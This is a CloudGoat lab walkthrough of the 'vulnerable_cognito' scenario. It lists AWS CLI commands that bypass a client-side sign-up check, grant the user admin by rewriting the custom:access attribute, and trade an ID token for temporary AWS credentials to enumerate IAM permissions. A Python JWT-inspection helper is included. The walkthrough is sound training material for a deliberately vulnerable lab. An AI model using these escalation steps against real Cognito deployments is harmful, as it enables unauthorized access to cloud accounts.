CloudGoat: Vulnerable_Cognito
Note:
- We perform the attack from Kali Linux
- Ensure you have completed the prerequisites before starting the lab
1. Preparation
1.1 Launch the scenario:
┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_cognito
1.2: read the start.txt file
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_cognito*
┌──(root㉿kali)-[/opt/cloudgoat/xxx]
└─# cat start.txt
apigateway_url = https://xxxyyy/index.html
... ... ...
2. Enumeration
2.1 open the URL in a browser
- the page offers a sign-up option
- signing up with a personal gmail address fails: the form rejects the address before anything is sent to Cognito
- in the page source (lines 43 and 44) we find the Cognito app client ID and region that the next step needs
2.2: use the AWS CLI to sign up and confirm the account directly against the user pool, bypassing the client-side email validation. The user pool itself accepts any address the API receives; the confirmation code is delivered to the mailbox you registered
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --password P@ssw0rd --user-attributes '[{"Name":"given_name","Value":"lorem"},{"Name":"family_name","Value":"ipsum"}]' --region us-east-1
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp confirm-sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --confirmation-code 287215 --region us-east-1
2.3: login via browser with our signed up credentials
- once logged in, we are redirected to reader.html page
2.4: get the value of the access token
- inspect element > storage > local storage > copy the value stored under the key ending in .accessToken (local storage, not a cookie; the matching .idToken key sits next to it and is needed in 2.7) > save it into a file “accessToken.txt”
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat accessToken.txt
access token = eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx
2.5: get the attributes and metadata of our own user (GetUser only needs the access token)
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp get-user --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --region us-east-1
2.6: update the custom:access attribute to grant ourselves admin permission. This is self-service UpdateUserAttributes: it is authorised by our own access token, so it succeeds whenever the app client lists custom:access among its writable attributes, and the escalation works because the application trusts that user-controlled attribute for authorization
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp update-user-attributes --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --user-attributes '[{"Name":"custom:access","Value":"admin"}]' --region us-east-1
2.7: get the IdentityPoolId, a fresh ID token, and the identity id
- the tokens we already hold were issued before the attribute change, so their claims still lack custom:access=admin; we log out, log in again, and open “admin.html” by hand
- view page source, we find the IdentityPoolId (and the user pool ID used below)
- we pull the new ID token from local storage (the key ending in .idToken); the identity pool's --logins map expects the user pool ID token, not the access token, and custom attributes are only carried in the ID token
# ***SYNTAX***
# aws cognito-identity get-id --region [region] --identity-pool-id '[IdentityPool_Id]' --logins "cognito-idp.{region}.amazonaws.com/{UserPoolId}={idToken}"
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-id --region us-east-1 --identity-pool-id 'us-east-1:a6e3df92-034e-4fd1-968f-beb577bd5a92' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"
{
"IdentityId": "us-east-1:9b575e70-f9d7-cd3e-8840-7be3fecf4d37"
}
2.8: exchange the identity for temporary AWS credentials. GetCredentialsForIdentity takes the IdentityId returned in 2.7 (not the pool id); the result is an STS session for the identity pool's authenticated role
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-credentials-for-identity --region us-east-1 --identity-id 'us-east-1:9b575e70-f9d7-cd3e-8840-7be3fecf4d37' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"
{
... ... ...
"Credentials": {
"AccessKeyId": "xxxaaa",
"SecretKey": "xxxbbb",
"SessionToken": "xxxccc",
... ... ...
}
}
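Before handing a token to cognito-identity it is worth checking which of the two JWTs copied from local storage you are actually holding, and whether the escalated attribute has made it into the claims yet. The Python below is an added example, not part of the CloudGoat scenario or of the original write-up: it decodes the JWT payload without verifying the signature (enough for inspecting your own tokens, never for an authorization decision) and derives the --logins provider name from the token's iss claim instead of typing it by hand. The three tokens it builds are constructed test data with dummy signatures; they reuse the lab's user pool ID and app client ID from the commands above, and the "reader" default for custom:access before the update is an assumption.

```python
"""Inspect Cognito user pool JWTs: id vs access, expiry, escalated claim, --logins key."""
import base64
import json
import time

REGION = "us-east-1"
USER_POOL_ID = "us-east-1_BEEOWbReZ"       # from the get-id command above
CLIENT_ID = "6838885ultq3m8b3n0n93ov3ek"   # from the sign-up command above
ISSUER = f"https://cognito-idp.{REGION}.amazonaws.com/{USER_POOL_ID}"
SAMPLE_NOW = 1_700_000_000                  # fixed clock for the constructed samples


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_unsigned_jwt(claims: dict) -> str:
    """Build a JWT-shaped string with a dummy signature. Constructed test data only:
    a real Cognito token is RS256-signed with a key published in the pool's JWKS."""
    header = _b64url_encode(json.dumps({"kid": "constructed", "alg": "RS256"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    return f"{header}.{payload}.c2lnbmF0dXJl"


def decode_claims(token: str) -> dict:
    """Return the payload claims WITHOUT checking the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def token_kind(token: str) -> str:
    """Cognito tags every JWT with token_use: 'id' or 'access'."""
    return decode_claims(token).get("token_use", "unknown")


def is_expired(token: str, now=None) -> bool:
    now = time.time() if now is None else now
    return decode_claims(token).get("exp", 0) <= now


def has_admin_claim(token: str) -> bool:
    """custom:* attributes are embedded only in the ID token, and only in tokens
    issued after UpdateUserAttributes, which is why step 2.7 logs out and back in."""
    return decode_claims(token).get("custom:access") == "admin"


def login_provider(token: str) -> str:
    """The --logins key is the issuer without the scheme:
    cognito-idp.<region>.amazonaws.com/<user pool id>."""
    iss = decode_claims(token)["iss"]
    if not iss.startswith("https://cognito-idp."):
        raise ValueError(f"not a Cognito user pool token, iss={iss}")
    return iss[len("https://"):]


def pick_id_token(tokens, now=None) -> str:
    """GetId / GetCredentialsForIdentity want a live ID token in the --logins map."""
    for tok in tokens:
        if token_kind(tok) == "id" and not is_expired(tok, now):
            return tok
    raise LookupError("no unexpired ID token among the candidates")


_SUB = "c0ffee00-0000-4000-8000-000000000001"   # constructed user id

# ID token from the first login; custom:access still at its (assumed) default
ID_TOKEN_BEFORE = make_unsigned_jwt({
    "sub": _SUB, "aud": CLIENT_ID, "iss": ISSUER, "token_use": "id",
    "cognito:username": "helloworld@gmail.com", "email": "helloworld@gmail.com",
    "custom:access": "reader", "iat": SAMPLE_NOW - 7200, "exp": SAMPLE_NOW - 3600,
})
# ID token after UpdateUserAttributes and re-login: the claim now reads admin
ID_TOKEN_AFTER = make_unsigned_jwt({
    "sub": _SUB, "aud": CLIENT_ID, "iss": ISSUER, "token_use": "id",
    "cognito:username": "helloworld@gmail.com", "email": "helloworld@gmail.com",
    "custom:access": "admin", "iat": SAMPLE_NOW, "exp": SAMPLE_NOW + 3600,
})
# Access token: carries no custom attributes; its scope is what authorises
# the self-service UpdateUserAttributes call in step 2.6
ACCESS_TOKEN = make_unsigned_jwt({
    "sub": _SUB, "client_id": CLIENT_ID, "iss": ISSUER, "token_use": "access",
    "username": "helloworld@gmail.com", "scope": "aws.cognito.signin.user.admin",
    "iat": SAMPLE_NOW, "exp": SAMPLE_NOW + 3600,
})


if __name__ == "__main__":
    for name, tok in [("before", ID_TOKEN_BEFORE), ("after", ID_TOKEN_AFTER), ("access", ACCESS_TOKEN)]:
        print(name, token_kind(tok), "expired" if is_expired(tok, SAMPLE_NOW) else "live",
              "admin" if has_admin_claim(tok) else "not-admin")
    chosen = pick_id_token([ACCESS_TOKEN, ID_TOKEN_BEFORE, ID_TOKEN_AFTER], now=SAMPLE_NOW)
    print("--logins", f"{login_provider(chosen)}=<ID token>")
```

Run it against the real tokens by replacing the constructed strings with the values from local storage; if token_kind reports "access", you copied the wrong key and GetId will reject the login map.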
2.9: enumerate the permissions of the temporary credentials automatically with enumerate-iam
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd /opt
┌──(root㉿kali)-[/opt]
└─# git clone https://github.com/andresriancho/enumerate-iam.git
┌──(root㉿kali)-[/opt]
└─# cd enumerate-iam
┌──(root㉿kali)-[/opt/enumerate-iam]
└─# ./enumerate-iam.py --region us-east-1 --access-key xxxaaa --secret-key xxxbbb --session-token xxxccc
3. Clean up
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_cognito
Destroy "vulnerable_xxx" ? [y/n]: y